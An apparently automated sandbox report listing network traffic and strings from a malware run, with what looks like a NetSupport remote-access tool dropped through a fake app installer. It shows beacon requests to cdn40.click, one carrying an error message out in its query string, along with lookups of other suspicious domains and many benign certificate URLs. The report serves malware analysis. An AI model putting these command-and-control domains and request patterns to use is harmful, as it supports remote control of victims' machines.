Source: global traffic	HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: wsj.pm
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: cdn40.click
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: cdn37.space
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1Host: cdn40.clickConnection: keep-aliveContent-Length: 252sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://wsj.pmSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:46 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32e4f9eb7b94-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpO2r4fs25YzisX9YLOcwDB82LXIOVmigH3XY%2FFt67AmUUvniElkOaPdgZmArGqppH%2F8FlUuDxQmnY%2FPc%2FsNACxS8lgRTe5PUJ2RmA9z1zD21d%2BOYMBhqFgbGMcfZpAYWX%2BTRmneJHv%2FopjQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:46 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32e82dd844fb-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6SrsSnqixI3RpKqX%2FZUq7nKTdWLt9aLmUfGW8t0eOlRH1f1EslcbspDPTWflaGdC8mouJqcFzXWVIEyUAsbXrmrGqdWf8ObwhW4bmNHSTKSNhbBXy9%2FbjNzvLQTDXeOZtM%2BEc15T0difRof"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 14:59:47 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 879f32eb4ea069f2-ATLCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdmZL%2B3RJLcDnTaFr83qRRF8nS%2F%2BnqX9D09jHlAuck7c2%2BV4bzbZgHpxZ00TGk0I7NRAFz0YdbJxdcAcmoP%2Bh%2BRwCW4jWIJhKb2cOrK8xP%2FRmkYT%2Brsyjt7xFzl1UT95yt8BkTYpbhPgdKg6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Source: client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr	String found in binary or memory: http://%s/testpage.htm
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://127.0.0.1
Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ac.economia.gob.mx/cps.html0
Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ac.economia.gob.mx/last.crl0G
Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acedicom.edicomgroup.com/doc0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv10.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: AppInstaller.exe, 0000000E.00000002.1775764927.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: AppInstaller.exe, 0000000E.00000003.1679946512.00000196D5F7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0P
Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0#
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.postsignum.cz/crl/psrootqca4.crl02
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.postsignum.eu/crl/psrootqca4.crl0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: AppInstaller.exe, 0000000E.00000002.1776167790.00000196D5FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, TCCTL32.DLL.26.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680617833.00000196D5F42000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: client32.exe, client32.exe, 00000020.00000003.1940686628.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000020.00000003.1941988586.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1940878596.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1942600345.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2537133329.0000000005A38000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2543509132.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspBranchCache
Source: client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspConnected
Source: client32.exe, 00000020.00000002.2544309699.0000000005AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspCoreNet-Diag-ICMP6-EchoRequest-Out-NoScopeLMEMX
Source: client32.exe, 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspMicrosoft-Windows-PeerDist-HostedClient-OutLMEMX
Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspuest-Out-NoScope
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: powershell.exe, 00000017.00000002.2398750900.000001E12D1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2180463385.000001E11EA2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2398750900.000001E12D07C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: AppInstaller.exe, 0000000E.00000002.1775680653.00000196D5F93000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679968743.00000196D5F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
